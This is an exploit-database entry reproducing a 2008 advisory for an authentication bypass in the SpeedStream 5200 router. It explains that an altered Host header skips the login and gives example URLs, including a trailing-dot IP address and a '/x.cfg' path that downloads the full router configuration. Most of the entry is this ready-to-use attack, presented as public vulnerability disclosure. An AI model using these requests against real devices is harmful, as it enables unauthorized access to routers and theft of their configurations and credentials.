SpeedStream 5200 Authentication Bypass Config Download Vulnerability

EDB-ID: 7055	CVE: 2008-6916	OSVDB-ID: 49870
Author: hkm	Published: 2008-11-07	Verified:
Exploit Code:	Vulnerable App: N/A

######################################################################################
 SpeedStream 5200 Authentication Bypass - hkm 12/10/2008
 (Server: NetPort Software 1.1)
 It is posible to bypass authentication by modifying the Host header.
 If you use a Host that is not the authentic one it will not require authentication.
 http://189.255.255.255./          -  This would bypass authentication too.
 http://189.255.255.255./x.cfg     -  This downloads the full router conifguration.
 hkm [ @ ] hakim.ws
______________________________________________________________________________________
######################################################################################
# milw0rm.com [2008-11-07]

Comments

SpeedStream 5200 Authentication Bypass Config Download Vulnerability

Rating

No comments so far